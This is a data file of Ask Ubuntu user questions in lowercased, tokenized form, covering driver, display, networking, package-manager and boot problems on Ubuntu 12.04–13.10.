407315	wireless network completely disabled	i have read many posts and the answers provided do n't seem to help me . i have ran many commands and pasted them below so hopefully will cover the basic questions about my system and what i am experiencing . as you can see , i have no wired connection anymore . i had to move my pc so can ; t connect physically anymore . your assistance will be most appreciated . hey wilf thanks very much for your assistance and apologies for the delay . i decided to remove all the old stuff , as i think it will be irrelevant now . i have rerun the script but lspci gives me nothing to do with network . see below for results ( i removed the details and only provided the headers ) : salvador @ salvador : ~ $ sudo lshw -c network [ first it shows ] cpuid [ but quickly turns to ] pci ( sysfs ) [ but after a few seconds , it turns to nothing ] -- -- -- -- -- -- -- -- -- -- -- -- -- salvador @ salvador : ~ $ sudo lshw -class network [ same as above ] -- -- -- -- -- -- -- -- -- -- -- -- -- salvador @ salvador : ~ $ sudo lspci -v 00:00.0 ram memory : nvidia corporation ... 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) ... 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) ... 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) ... 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) ( prog-if 10 [ ohci ] ) ... 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) ( prog-if 20 [ ehci ] ) ... 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) ( prog-if 01 [ subtractive decode ] ) ... 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) ... 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) ( prog-if 8a [ master secp prip ] ) ... 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) ... 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) ( prog-if 85 [ master seco prio ] ) ... 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) ( prog-if 85 [ master seco prio ] ) ... 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) ... 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) ... 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) ( prog-if 00 [ normal decode ] ) ... 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 7025 / nforce 630a ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) ... 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration ... 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map ... 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller ... 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control ... 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control ... once again , thanks you very much for your help thus far and your very clear instructions .
407317	ubuntuone stuck at local_rescan	i 'm using xubuntu 12.04 lts 64bit with latest updates . since quite a few days ubuntu one does not sync anymore . u1sdtool -s prints : state : local_rescan connection : with user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working ubuntuone-indicator app additionally says : 11 tasks pending ( 39,5kib total ) i already tried to quit , restart and reinstall ubuntuone but nothing helped . what 's going on ?
407318	macbook air : black screen on second ( dvi- > ) hdmi display	my machine is an apple macbook air 1,1 from early 2008 , and i 'm running ubuntu 12.04 with kernel linux 3.2.0-58-generic-pae . when i connect it to an hd tv via the minidisplayport-dvi ( apple adapter ) -- > dvi-hdmi ( cable ) i get the tv recognized in system settings - > displays , but the tv only gets a completely black screen signal ( i.e . it gets a signal , because if i unplug the cable or disable the tv screen in ubuntu the tv then says 'no signal ' , but this signal is just black screen ) . the tv is philips 32pfl4007m/08 but in system settings - > displays it gets named ''philips consumer electronics 58 '' the output from xrandr ( with cable plugged in ) is screen 0 : minimum 320 x 200 , current 3200 x 1080 , maximum 8192 x 8192 lvds1 connected 1280x800+0+12 ( normal left inverted right x axis y axis ) 286mm x 179mm 1280x800 61.2*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1280+0 ( normal left inverted right x axis y axis ) 1280mm x 720mm 1920x1080 60.0*+ 50.0 24.0 1600x1200 60.0 1280x1024 60.0 1360x768 59.8 1024x768 60.0 800x600 60.3 640x480 60.0 tv1 unknown connection ( normal left inverted right x axis y axis ) 848x480 59.9 + 640x480 59.9 + 1024x768 59.9 800x600 59.9 am i missing some configuration in ubuntu ? or is that a driver problem for the tv or the apple adapter ? could it be related to compiz or nvidia drivers ? from apple page i read graphics and video support intel gma x3100 graphics processor with 144mb of ddr2 sdram shared with main memory extended desktop and video mirroring : simultaneously supports full native resolution on the built-in display and up to 1920 by 1200 pixels on an external display , both at millions of colors mini-dvi port regarding nvidia drivers since i get cat /proc/driver/nvidia/version no such file or directory i believe i 'm not using any nvidia drivers . with lspci i get intel corporation mobile gm965/gl960 integrated graphics controller also 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : apple inc. device 00a2 flags : bus master , fast devsel , latency 0 , irq 42 memory at 90000000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) subsystem : apple inc. device 00a2 flags : bus master , fast devsel , latency 0 memory at 90100000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > and xxx @ xxx : ~ $ sudo lshw -c display *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory:90000000-900fffff memory:80000000-8fffffff ioport:5110 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory:90100000-901fffff
407319	providing alias for eclipse does not work	i tried to open my bashrc and tried to provide an alias for eclipse like alias eclipse='bash /usr/local/softy/eclipse/eclipse' but i get the following error when i try to invoke eclipse . /usr/local/softy/eclipse/eclipse : /usr/local/softy/eclipse/eclipse : can not execute binary file its permission is -rwxr-xr-x 1 messagebus users 71023 feb 8 2012 /usr/local/softy/eclipse/eclipse and i am able to open it directly from terminal like /usr/local/softy/eclipse/eclipse how should i correct it ?
407320	permission problems when installing matlab r2013b	i am trying to install matlab and i am running into some issues with the installer program with ubuntu 13.10 . i get to the screen which tells me to select the directory i wish to install in , i then select next and it tells me the folder does not exist and asks me if i wish to create a new one ; if i select to create the folder it gives me the error : failed to create folder ( /usr/local/matlab/r2013b/ ) i then tried to create the folder manually ; using sudo mkdir /usr/local/matlab/ and then sudo mkdir /usr/local/matlab/r2013b/ , but the installation continues to fail with the same error . has anyone encountered and overcome this error before ? thanks in advance !
407324	oracle configuration in libreoffice base	i am new to ubuntu ; kindly answer to my query even though it is simple ... i want to work sql plsql in ubuntu . so i have downloaded libre office base but i am not able to connect to the oracle database and i am not aware of odbc and jdbc . i tried installing oracle 11g completely to system but somehow it was not successful . kindly help me in working oracle in ubuntu .
407325	get ubuntu running on a machine with 2 ati radeon r9 270 graphical cards	i recently build a new computer . this are some specifications : motherboard : gigabyte z87x-ud3i processor : intel i5 haswell graphics card : 2x gigabyte radeon r9 270 i 've tried to get ubuntu running in this system . when i disconnect both r9 graphical cards i can install ubuntu and run ubuntu in graphical mode . after install , i reconnected the r9 's and kept my display on the onboard card and was able to run in text mode ( when i connected to the r9 i did n't manage to reach text mode ) . i downloaded amd catalyst 13.12 and installed it . after restart i did n't get any display from the onboard card . so i reconnected the screen to one of the r9 cards and restarted ubuntu . the graphical login loads fine but after login i see a dialog at the left top of the screen with system error detected and i get to choose to report or cancel . after any choose the dialog closes an i get stuck with a black screen and a mouse cursor . i think the problem is with the r9 cards because when i disconnected these cards the system worked fine . can anybody help me solve this problem ?
407326	problems while doing 'sudo apt-get upgrade '	i started facing this sudden issue a few days ago when i was once trying to 'update ' and 'upgrade ' , something regarding corruption of package index files in the apt-repository and i 've not been able to figure this out ; here , following is the output on the command line : $ sudo apt-get upgrade [ sudo ] password for adarshc : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-generic-lts-raring linux-image-generic-lts-raring the following packages will be upgraded : accountsservice apt apt-transport-https apt-utils avahi-autoipd avahi-daemon avahi-utils base-files bc bind9-host chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg consolekit dc dnsutils duplicity firefox firefox-locale-en flashplugin-installer fonts-opensymbol gdm gir1.2-accountsservice-1.0 gir1.2-appindicator3-0.1 gir1.2-gtk-3.0 gnome-control-center gnome-control-center-data gnome-desktop3-data gnome-tweak-tool gnupg gpgv grub-common grub-pc grub-pc-bin grub2-common iproute landscape-client-ui-install language-pack-en language-pack-en-base language-pack-gnome-en language-pack-gnome-en-base libaccountsservice0 libappindicator1 libappindicator3-1 libapt-inst1.4 libapt-pkg4.12 libavahi-client3 libavahi-common-data libavahi-common3 libavahi-core7 libavahi-glib1 libavahi-gobject0 libavahi-ui-gtk3-0 libbind9-80 libcec2 libck-connector0 libcurl3 libcurl3-gnutls libcurl3-nss libdjvulibre-text libdjvulibre21 libdns81 libdrm-intel1 libdrm-nouveau1a libdrm-nouveau2 libdrm-radeon1 libdrm2 libgail-3-0 libglu1-mesa libgnome-control-center1 libgnome-desktop-3-2 libgtk-3-0 libgtk-3-bin libgtk-3-common libisc83 libisccc80 libisccfg82 libjpeg-turbo8 liblwres80 libnfs1 libnss3 libnss3-1d libpam-ck-connector libpixman-1-0 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-style-human libreoffice-style-tango libreoffice-writer libsmbclient libssl1.0.0 libunity-2d-private0 libunity-core-5.0-5 libwbclient0 libxfixes3 libxfont1 libxi6 linux-firmware linux-generic-lts-raring linux-libc-dev openssl pm-utils python-appindicator python-software-properties python-uno qdbus rar rsyslog samba-common samba-common-bin smbclient software-center software-properties-common software-properties-gtk thunderbird thunderbird-globalmenu thunderbird-gnome-support ubuntu-tweak unity unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread unity-common unity-services uno-libs3 ure xbmc-bin xbmc-pvr-argustv xbmc-pvr-dvbviewer xbmc-pvr-mediaportal-tvserver xbmc-pvr-mythtv-cmyth xbmc-pvr-nextpvr xbmc-pvr-njoy xbmc-pvr-tvheadend-hts xbmc-pvr-vdr-vnsi xbmc-pvr-vuplus 159 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . e : the package index files are corrupted . no filename : field for package gnome-tweak-tool .
407329	including external header files in programs	being using windows for most of the time and deciding to start programing in ubuntu , i would like to know how i can include the external header file in my programs.do i download them manually and paste them into the folder wheres the file ? please be kind ...
407331	would like to dual boot - ubuntu windows 8.1 - advice please	there is some windows software that i really need to use which will not run under wine . therefore i am seriously thinking of a dual boot machine . in order to accomplish this i am planning on purchasing a new pc . the pc i have now will not run any windows past xp . after reading several posts about setting up a dual boot machine , it seems to me as though the potential for success is greatly influenced by who made the computer and what hardware they used when they made it . my two questions are : is there a list anywhere of manufactures or models that offer the path of least resistance to installing ubuntu ? if i were to buy a computer with ubuntu preinstalled from zareason or system76 , should i be able to install ( and run ) windows 8.1 on it ?
407332	ubuntu server setup , sync folders , available offline , music etc	i am setting up a ubuntu server ( 13.10 ) for my home network and need some suggestions on how to go about setting up shares , offline files etc . here is what i am trying to accomplish : ability to have local folders backed up on the server automatically both on ubuntu clients and windows clients . i would like these folders locally not on the server but when a change is made on the client and if the server is available have the contents on the server updated . this sounds like i would want to setup a cloud server but have also seen suggestions for rsync and other programs . not sure which way to go about it . there are music and video directories are on the server and would like these available to all clients on the local network but additionally would like to setup a ssh server or something similar so these directories can be accessed from the internet , cell phones and other devices . i am not sure how to make these directories available to all devices especially cell phones , will this require some custom programming ? i installed lubuntu desktop on the server so i can have a gui to do administration tasks but have disabled the automatic start-up of the desktop . i can start the desktop gui by using the startx command , however i am not sure how to shut down the desktop gui without having to reboot . basically i just want a on-demand desktop gui . is there a way to setup a script on the server that would automatically mount folders as drives on both ubuntu and windows clients ? i would like to have a global disk structure between all the clients on the local network i have done research on these items but have come across several options that just seem to be over complicated and/or obsolete . obviously i want to keep things as simple and easy to administer as i can because i tend to over complicate things ; - ) thank you for the help ! andy
407333	changes made to html / css / js ( stored on ntfs partition ) are lost	i edit web pages ( saved on ntfs partition ) using komodo edit . as long as i usu ubuntu ( 12.04 ) everything seems to be fine ( changes appear to be saved ) , but after rebooting / switching to windows 8 all changes in html / css / js files are lost . same thing goes with png / jpg images edited with gimp . i have also noticed some worrying changes in random files ( parts of some are put in different ones ) which makes me wonder if the whole issue is somehow connected with ntfs file system handling . on the other hand i have no problem with downloading to or creating new files on the ntfs partition while using ubuntu . i will appreciate any feedback on this matter .
407336	upgrade errors and problems 13.10	i am relatively new to ubuntu having run 10.04 for just over a year without a single glitch of any magnitude . i decided to upgrade , which was certainly a mistake but am trying to correct for the results of my status as a linux novice . i am running a dell evo . i attempted to upgrade to 13.10 and the installation hung . i did a little research and found that sometimes a usb keyboard causes a failure . i replaced with a ps2 and the installation went without issue . restarting the system after install , i found that all personal items were on the desktop and accessible but all the pinned programs , software icons on the left side were absent . through a link on my desktop i was able to get to the web and began reading . i discovered what may be my major error . i failed to upgrade step by step through each new version . because everything i have is cloud backed up , i decided to reinstall a new version alongside the partially operative version but found that i could not close the browser . after exhausting other options , i did a hard restart and installed another version alongside . starting that installation gave me a totally blank background . the only action possible was a right click that allowed the creation of a new file . i am now considering either a reformat or a new hard drive and a totally clean install of 13.10 . any thoughts ?
407338	can not change my screen brightness	though i am pressing brightness keys on my laptop.the brightness is still not changing but showing change in progress bar of brightness setting . hardware spec : intel pentium dual core 2.1 ghz 64 bit processor ; intel hd3000 graphic card ; 2 gb ram 1333 mhz ; 500 gb hdd sata ; model : lenovo g580 ( 2689 ) ; ubuntu 13.10 updated up to date no problem if i get temporary solutions ... but please help .
407340	ubuntu 12.04 : no wifi option	here 's my problem : i have no wifi option showing up in the network manager ... so i looked here ( ask ubuntu ) for the solution and there are hundreds of answers , but i just need one.. so i check for additional drivers from the system settings and it says no proprietary drivers ( the card the box came in says it 's linux capable ) ? so i find the hardware driver i need ( from the ubuntu hardware driver page ) .. it 's for a 7260ac wireless card.. i know it works cause i loaded it on here once before but for some reason , it disappeared . so where can i find the answer on how to reload this driver to make it work again ? i know it 's on here somewhere.. i saved this in case the problem happened again but it 's no longer there : askubuntu.com/questions/374165/ubuntu-12-04-no-wireless-after-install
407341	download on usb drive	i downloaded ubuntu on my usb drive . a screen called nti media maker popped up asking me how i wanted to burn the disk . what should i do ?
407345	ubuntu 1310 with two nics : one with dynamic address and one with static address	i am running ubuntu 13.10 on a laptop with one physical wired nic ( eth0 ) and one physical wireless nic ( wlan0 . the current config is shown below ( i removed lo interface since it is of no relevance ) casa @ ubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr 9c:8e:99:00:01 : e5 inet addr:97.76.237.67 bcast:97.76.237.79 mask:255.255.255.240 inet6 addr : fe80 : :9e8e:99ff : fe00:1e5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5837 errors:0 dropped:0 overruns:0 frame:0 tx packets:384 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:772954 ( 772.9 kb ) tx bytes:51795 ( 51.7 kb ) interrupt:20 memory : d4700000-d4720000 wlan0 link encap : ethernet hwaddr ac:81:12:8e : d4:8e inet addr:192.168.1.19 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ae81:12ff : fe8e : d48e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14510 errors:0 dropped:0 overruns:0 frame:0 tx packets:8404 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2622226 ( 2.6 mb ) tx bytes:8724928 ( 8.7 mb ) eth0 is assigned a static address of 97.76.237.67 with network mask 255.255.255.240 with the gateway for this subnet at 97.76.237.65. wlan0 obtains address from dhcp server running at 192.168.1.1 . the current configuration of ip routing is shown below : casa @ ubuntu : ~ $ ip route default via 97.76.237.65 dev eth0 97.76.237.64/28 dev eth0 proto kernel scope link src 97.76.237.67 metric 1 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.19 metric 9 what i would like to achieve is to have all traffic into 97.76.237.0 subnet go through to 97.76.237.65 gateway through eht0 interface . all other traffic ( internet traffic ) should go through 192.168.1.1 gateway across wlan0 . is there anybody who could kindly guide me through this process ? thank you in advance marek
407347	sound stop working suddenly ... ? only work again with a new user	my sound stop working all of a sudden on my computer ! when it started , i had to reboot and everything was getting back to normal but then it stopped coming back . i try al sort of things ! ( alsamixer , killall , restarting services ! the strange thing is that the sound work on the login screen . i created a new user avec the sound work on that session . any hint on what happenend ? i have an asus f8p with ubuntu 13.10 thank you : - ) daniel
407351	i can not change the bios to boot with flash drive	help me , guys ! i can not change the bios to boot with flash drive . i change in the bios the usb to first , but when i reboot the laptop , just the windows starts . i need help ! sorry for the bad english .
407352	what do you mean by changelog ?	i am a relatively new ubuntu user and want to know what changelog is , and how to use it.it seems to come in response to some downloads , and i ca n't understand what it is .
407353	how to change firewall settings to allow traffic to certain ports	so i got a server with a provider , it is free for one month and they offer ubuntu lts 12.04 and windows server 2008 ; the windows server 2008 incurs a âź30 cost and since i 'm setting up a testing environment and do not intend to have the server for more than a month , i 've opted for ubuntu . the first thing i did was to download vmware player & windows server 2008 ( legally ) , and get the windows server 2008 installed . the remote desktop access from another computer does not work when trying to connect to the windows virtual machine , but other stuff like teamviewer works perfectly . how can i bypass ubuntu 's firewall and connect directly to windows remote desktop ? port 3389 on my server ip ( 188.138.106.161 ) shows up as being closed- the host machine is not behind any hardware firewall .
407355	problem in update and inatalling new package	i try to update 13.04 to 13.10 but it fail due to slow internet connection after this process software update and softer center are stop working . when i install an application show this message e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_saucy-security_universe_i18n_translation-en what is that
407359	while ubuntu 12.04 open show error message ( could not write bytes : broken pipe )	i tried to install nvidia but some errors happened so i uninstall it but while this happened this error show up when my ubuntu is opening ( could not write bytes : broken pipe ) i fixed every thing and ubuntu opened fine but this message still show up
407362	why is dd taking so long ?	background : i have an 8-disk network attached storage device . i 've been having issues with it where the hard drives fail on a regular basis . i figured out what the problem is with this : firmware issues with seagate hdds being compatible with my qnap . so i need to update the firmware on each of the 8 hdds . each of the hdds are 3tb in size . previously , when one failed , i told the nas to rebuild it ( since i used raid 5 ) , and it took somewhere between 42-44 hours to do . current problem : i am using dd to capture an image of one of the 3tb hdds . it is plugged into my other laptop via esata and the drive i am writing to is on a usb 3.0 connection . when i first started the image , i did the math to figure out how much time would be needed to finish . my calculations based on how long dd was running ( via ps ) and how much data had been written ( via ls ) , it looked to be the same ( 42-44 hours ) . however , this process has been going on for almost a week . at the rate it actually goes ( realtime ) it will take an entire week ( 7d to the hour exactly ) for this to finish . double-checking : right now , we 're at 6d of dd running its course . when i type ps -ef | fgrep disk1 i get the following : root 6444 6388 36 jan12 pts/0 2-04:54:14 dd if=/dev/sde of=/media/4tb/disk1.raw ps claims that this has only been running for 2d 4h , when in reality , it 's been running for over 6d . my questions : why is this ? how can i fix it ? could it be a multi-threading issue ( or lack of multi-threading i mean ) ? i did find that ubuntu was suspending the os when i closed the lid of the laptop , so i changed that very early on in the process so now it does n't sleep , but it 's still taking `` forever '' .
407369	how do you use the synaptic packege manager for downloading packages ?	i new to ubuntu , and have just installed synaptic . i want to know how to use it for downloading packages and and software.please help .
407376	win 8.1 corrupts uefi grub loading on restart	when i restart ( or shut down ) windows 8.1 , it always corrupts the grub uefi partition . next time i boot , grub says : grub loading stage1.5 . grub loading , please wait ... error 17 i have disabled in my bios quickboot/fastboot , and faststartup in my win8.1 configuration , as mentioned here : https : //help.ubuntu.com/community/uefi my boot-repair report is in this link : http : //paste.ubuntu.com/6769635/ i have checked this thread ( windows 8.1 repeatedly corrupts grub uefi boot manager ) without any positive result for me . do you have any other ideas ?
407377	ubuntu 13.10 on a samsung 900x3c keyboard light and hotkey light	i have a samsung np900x4c and i 've installed ubuntu 13.10 . but i have problems . 1.problem : i can use my hotkey for example wifi on/off so i can turn off the wifi but the led status doesnt change it takes the last status of windows how can i fix that 2.problem is the keyboard backlight . i can turn it on/off when i use the fn key fn+ff9 or fn +f10 i see the full bar in the top right corner but i ca n't change the bar so i cant change the brightness of the backlight ( its always on ) so how can i fix it i have searched on the internet but the guides doesnt function on my notebook mfg punkbanana ( sry for my bad english=
407379	command/app to convert video files	anyone know how to batch convert multiple video files into smaller sizes ?
407381	can not install nvidia driver 319.82 .run file for geforce gtx 780 ti	i just built a new machine and installed ubuntu 13.10 on it . when i first logged in , my resolution was tiny and there were no proprietary drivers available under updates in the system options menu . it appears that the current driver in the repository does n't support the 780 ti . so i downloaded the 319.82 driver.run file which supports the 780 ti , but i can not for the life of me figure out how to install it . i 've spent all morning combing through google and trying every solution i could find but nothing has worked . the closest i 've gotten is trying to run the .run from the command prompt in start up recovery mode , where it tells me extraction failed . i set the file to run as an executable in the properties menu in unity , but still no dice . if someone could give me simple , new linux user friendly , step by step directions on how to get my new graphics card to play nice with ubuntu , that 'd be great . i should mention that pressing ctrl + alt + f1 in unity results in a blank screen with no prompt . the only way i can use ubuntu without x server turned on is the startup recovery mode command prompt . thanks in advance . edit : now when i select my drive with my windows installation , which is on a completely separate drive from linux , it tells me bootmgr is missing and i am unable to boot into windows now . i 'm trying the system recovery tools but its not working . this is completely unacceptable . your software should come with a warning that it will hose your windows installation . i am giving up on linux . it took me two days of downloading to get everything setup . screw this .
407385	configure terminal to use same set of hotkeys , no matter what shell is running inside of it ? ( text navigation/selection/copy/paste etc ... )	i have a set of keyboard shortcuts that i use all the time in every other application ( browser , text editor , input fields in file manager , etc ) . they 're not optimized by any means , but they 're in my muscle memory , so i figure i should be able to get my terminal to understand them , right ? i mean , you should be able to easily change stuff like shortcuts to suit your preferences ( even if they 're kinda stupid ) , rather than have to retrain yourself to whatever preferences the system defaults think you should have , right ? so a while ago , i configured my system shell to understand ctrl-back/forward as back-word/forward-word ... it was stupidly difficult to figure out how , and i ca n't remember the details without looking them up again . that hardly makes everything work like i like , but at least it was an improvement.. but i just noticed that that configuration does n't extend to the ruby pry shell , where they still have the insane default behavior of spitting out the garbage strings ; 5d and ; 5c . so how the heck do i get text navigation/selection/copy/paste etc in the terminal to just work like i want , no matter what particular shell is running in it ? does it depend on the terminal i 'm using ( yakuake ) , or are there some system files somewhere that control it for all terminals , or what ?
407386	how do i install an asus usb-n66 wifi adapter on ubuntu 12.04	i just bought an asus usb-n66 wifi adapter and would like someone to describe what steps i need to download and install the rt3573 linux driver .
407390	boot from usb with 3g/4g	does a small usb stick exist which has built in 3g or 4g , and can be plugged into any computers usb port to boot into linux giving you internet access using the 3g or 4g built into the usb stick which booted linux ?
407391	fix bootloader after removing ubuntu from a dual boot system ?	i have installed a ubuntu alongside pre-installed windows-8 ... and now i have uninstalled ubuntu . but the problem is that after removing ubuntu and typing `` bootrec/fixmbr '' in command prompt , there is still showing a boot manager with only one option windows-8 . how can i get rid of this mess ?
407392	ubuntu drive claims no space for mounting drive but 6gb is free	i formatted an 8gb thumb drive as fat32 , and used unetbootin to load ubuntu version 12.04 lts ( 32 bit version ) . ubuntu ( live not installed ) boots fine on my dell desktop computer ( which contains a 1 terabyte hard drive ) but wo n't mount a second 8 gb thumb drive claiming there is insufficient space . examining the ubuntu thumb drive in windows reports over 6 gb of free space . how can i correct this to allow mounting the drives ?
407393	how to remove the password of the sd card in ubuntu 12.04	i forgot the password of my micro sd card . how can i remove the password of the sd in ubuntu 12.04 . i tried using system files in mobile but it did not successes .
407398	how do i do a complete dhcp server configuration	i am new bie to linux and wants to configure complete dhcp server and how i can assign ips to clients on ubuntu or windows machine . will it connect clients automatically to my linux ubuntu machine or i may give some configuration .
407399	can i run my full ubuntu unity desktop on my windows machine using x ?	i am currently running ubuntu 13 desktop edition on a second pc on my desk , which has one small monitor . for work reasons my primary machine must be windows ( 7 ) , and it has multiple monitors , of varying resolutions . i wish to have my ubuntu desktop fill up all those windows monitors at their native resolutions so that i can basically make ubuntu my primary desktop , without physically plugging in the keyboard and monitors into the ubuntu box . both machines are connected within a fire walled internal 1gb network , and both have fixed ip addresses . nomachine nx is working pretty well up to now , but seems limited to aping the exact resolution of the ( small ) monitor i have on the ubuntu box . vnc the same . i do not wish to use a vm solution such as vmware ( though this does work ) , as i need more than one computer for reasons of data analysis throughput . is this possible ? is it viable ? and how exactly do i go about it ? i have already downloaded and run mobaxterm , and running terminals over ssh seems to work fine . i have also run firefox and other ubuntu-machine applications in windows on my windows machine , by calling them from the ssh terminal command line . but no luck so far getting the full unity monty across my windows monitors .
407400	how to use the command 'watch '	i want to know exactly what the command watch is and how it is used to watch files and folders . how to operate it from a command-line terminal ?
407405	what is a tcp wrapper and how do i use it ?	what is a `` tcp wrapper '' , and how can i use it to improve system security ?
407407	is there a ppa for up to date netbeans installation on ubuntu 12.04 ?	i search for my question too much , but i did n't found any good answer . i want to know is there any separate repository for installing and updating netbeans on ubutnu 12.04 ? in the ubuntu 12.04 standard repositories , netbeans version is 7.1 , in case that the 7.4 version is released .
407409	gnuplot : how to plot columns with headers as filenames ?	i am using gnuplot for plotting data . i have a specific problem . i have a data file which has titles in its first row . i want to generate separate plots for each data . each plot should be named after its header . say , for instance time displacement velocity acceleration 0 0 15 0 1 10 100 5 set terminal png set output `` .png '' plot for [ i=2:4 ] * using 1 : i i need the output of 1:2 as displacement.png , 1:3 as velocity.png , etc . is there any way of doing it ? ?
407410	how to get back the /var/lib/dkpg folder ?	my friend deleted the /var/lib/dkpg folder of his 12.04 installation . without it apt-get is not working . i 'm new to ubuntu and do n't know much . how do i get it back ?
407411	documentation for ~/.config/autostart/ *.desktop entries 12.04	i 'm using 12.04 lts . i 'm trying to run a python script as an autostart but it acts abnormally ( but works perfectly when started via terminal or idle ) . i 'm beginning to suspect that something in the .desktop file could be playing a role . i 'm looking for documentation for *.desktop files located in ~/.config/autostart/ or even a broader description of the whole autostart process . i would like to know what the supported line items are in the *.desktop files and the possible settings for each . is there a man page that covers this ?
407414	errors when upgrading to 13.10 , but has it actually worked ?	i just ran the upgrade from 13.04 to 13.10 , since it 's going to be eol sooner than i 'd expected , and had some weird issues with it . slightly puzzled about whether it 's actually worked properly or not . essentially , the installer hung for ages on some font . i opened firefox to check something quickly , and then when alt-tabbing to a different window the dash disappeared momentarily , and then an error about the package tex-common appeared . i submitted an error report , at which point another message appeared saying `` the upgrade has aborted . your system could be in an unusable state . a recovery will now run ( dpkg -- configure -a ) . '' after a short while , and a few terminal prompts asking me if i wanted to keep certain config files that had changed ( i opted to keep all of them ) it popped up again saying `` the upgrade has completed but there were errors during the upgrade process '' i ran sudo apt-get purge tex-common as well as sudo apt-get autoremove & & sudo apt-get autoclean , since i figured if i got rid of that package the upgrade would work this time around . ran the software updater again , and it told me to restart the computer to finish updates . i did , and now that it 's rebooted the computer seems to think that it 's running 13.10 now ; `` about this computer '' tells me 13.10 , and there is a new icon in the topright corner that has to do with my keyboard layout , which i can only assume is new with this distro ... . but i 'm not convinced that it 's worked properly . so , is this actually running 13.10 now , or could it be some odd hybrid ? software updater tells me the system is up-to-date , but i do n't know how to be sure of this . is there anything i can do to check or , as i 've been dreading , is my only option to nuke from orbit and start again ? ( thankfully i keep the majority of my data on a different partition to my install , but it 's still rather a hassle to deal with a reinstall , considering how long i 've spent tweaking this to get it working the way i wanted ... )
407420	where is openvpn 's client configuration from network-manager 's openvpn plugin ?	i know how to write and when to put openvpn 's config files for clients but i would like to be able to see the config files generated by network-manager-openvpn plugin . ( for instance to change logging verbosity ) namely this one : any idea where are they stored ?
